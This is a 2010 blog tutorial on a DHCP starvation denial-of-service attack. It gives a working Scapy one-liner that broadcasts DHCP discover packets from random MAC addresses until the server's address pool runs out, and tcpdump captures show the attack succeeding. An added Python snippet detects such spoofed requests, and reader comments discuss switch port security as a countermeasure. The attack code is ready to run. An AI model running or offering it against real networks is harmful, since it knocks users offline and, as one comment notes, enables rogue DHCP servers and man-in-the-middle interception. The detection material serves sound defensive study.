
DHCP Denial of Service with scapy

by foip on December 9th, 2010

1. Introduction

This is a small post explaining how to run a starvation attack against a DHCP server with only three lines of code (thanks to Scapy!).

Information & download regarding Scapy :

Information about DHCP Starvation attack :


2. Starvation attack with scapy

Running a starvation attack is nothing more than sending a lot of dummy DHCP requests with random source MAC addresses. After a few seconds, there are no more IP addresses available in the pool.

Warning: Don’t run this attack against networks you are not authorized to test!

[root@host1 ]$ scapy
Welcome to Scapy (v1.1.1 / -)
>>> conf.checkIPaddr = False
>>> dhcp_discover =  Ether(src=RandMAC(),dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68,dport=67)/BOOTP(chaddr=RandString(12,'0123456789abcdef'))/DHCP(options=[("message-type","discover"),"end"])
>>> sendp(dhcp_discover,loop=1)
...............................................................^C
Sent 70 packets.

To stop the attack, simply press Ctrl+C.



Does it work? Yes, take a look at the following tcpdump captures.

2.1. The DHCP queries:

[root@host2 ]$ tcpdump -n -e -i eth0 port 68
ec:51:e2:20:5b:93 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 64:38:62:38:63:65, length 244
8e:97:0f:18:8a:19 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 39:33:39:37:65:66, length 244
28:a7:45:35:c0:47 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 38:34:66:64:33:63, length 244
...


2.2. Then the DHCP responses:

00:23:20:56:53:f0 > 64:38:62:38:63:65, ethertype IPv4 (0x0800), length 347: 192.168.0.1.67 > 192.168.0.117.68: BOOTP/DHCP, Reply, length 305
00:23:20:56:53:f0 > 39:33:39:37:65:66, ethertype IPv4 (0x0800), length 347: 192.168.0.1.67 > 192.168.0.118.68: BOOTP/DHCP, Reply, length 305
00:23:20:56:53:f0 > 38:34:66:64:33:63, ethertype IPv4 (0x0800), length 347: 192.168.0.1.67 > 192.168.0.119.68: BOOTP/DHCP, Reply, length 305
...
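
A defender-side check for the captures above, added here as an example that is not part of the original post: it parses `tcpdump -n -e` lines in the format shown in 2.1 and flags client broadcasts whose Ethernet source differs from the BOOTP chaddr, or whose chaddr bytes are all ASCII hex characters, which is what `RandString(12,'0123456789abcdef')` puts in that field. The function names, the benign sample line and the threshold are assumptions made for the illustration.

```python
import re

MAC = r"(?:[0-9a-f]{2}:){5}[0-9a-f]{2}"
# Matches `tcpdump -n -e` lines in the format shown in section 2.1.
REQ_RE = re.compile(
    rf"(?P<eth_src>{MAC}) > (?P<eth_dst>{MAC}),.*"
    rf"BOOTP/DHCP, Request from (?P<chaddr>{MAC})"
)
ASCII_HEX = set(b"0123456789abcdef")

# First three lines are the capture from section 2.1; the last one is a
# constructed benign client whose frame source equals its chaddr.
SAMPLE = """\
ec:51:e2:20:5b:93 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 64:38:62:38:63:65, length 244
8e:97:0f:18:8a:19 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 39:33:39:37:65:66, length 244
28:a7:45:35:c0:47 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 38:34:66:64:33:63, length 244
00:11:22:33:44:55 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 342: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 00:11:22:33:44:55, length 300
""".splitlines()


def flag_requests(lines):
    """Return (chaddr, reasons) for every broadcast request that looks spoofed."""
    flagged = []
    for line in lines:
        m = REQ_RE.search(line)
        if not m or m["eth_dst"] != "ff:ff:ff:ff:ff:ff":
            continue  # only client broadcasts on the local segment are judged
        reasons = []
        if m["eth_src"] != m["chaddr"]:
            reasons.append("eth-src/chaddr mismatch")
        if set(bytes.fromhex(m["chaddr"].replace(":", ""))) <= ASCII_HEX:
            reasons.append("chaddr is ASCII hex text")
        if reasons:
            flagged.append((m["chaddr"], reasons))
    return flagged


def starvation_suspected(lines, threshold=3):
    """True when at least `threshold` distinct flagged chaddr values appear."""
    # threshold=3 is an assumed value; tune it to the capture window and segment.
    return len({chaddr for chaddr, _ in flag_requests(lines)}) >= threshold


if __name__ == "__main__":
    for chaddr, reasons in flag_requests(SAMPLE):
        print(chaddr, "->", ", ".join(reasons))
    print("starvation suspected:", starvation_suspected(SAMPLE))
```

The ASCII-text check only matches requests built like the session in section 2; the source/chaddr mismatch and the count of distinct client addresses are the broader signals.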
 

3. The End

Hope you enjoy.



© 2010 – 2014, Fun Over IP. All rights reserved.


5 Comments
  1. Hi my friend,

    Thank you for this info, but how can I prevent this on my network?

    • foip

      Hi, it depends on your environment. See some examples here: http://hakipedia.com/index.php/DHCP_Starvation

    • Goodies

      Hello! You will need to enable port security. Settings may vary by distributor, but the main way I use to prevent this attack is to limit the number of MAC sources allowed from one port.

      Another thing that’s good to do is enable a single port to trust the legitimate DHCP server. When someone runs this DOS attack, they will easily be able to set up a rogue DHCP server acting as the default gateway, and become man in the middle.

  2. I’m just using a Linux gateway serving as a hotspot. Can I prevent this using iptables? Can you please tell me how to do it? I’m worried because I did your procedure and it consumed all the IPs and hung. I need to prevent this…

    • foip

      I’m afraid I have no idea. Such attacks are usually prevented on the switch “ports”. The goal is to limit the number of clients (MAC addresses) behind a physical port. Maybe Google knows the solution for your environment.
      Good luck.
